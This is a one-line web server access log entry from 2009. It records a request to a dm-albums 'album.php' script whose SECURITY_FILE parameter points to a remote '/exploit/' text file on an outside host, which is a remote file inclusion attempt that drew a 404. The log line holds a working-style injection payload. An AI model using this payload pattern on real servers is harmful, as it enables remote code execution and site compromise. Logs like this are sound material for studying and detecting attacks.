200.135.218.37 - - [13/Oct/2009:04:34:42 -0400] "GET /logs/%031/dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
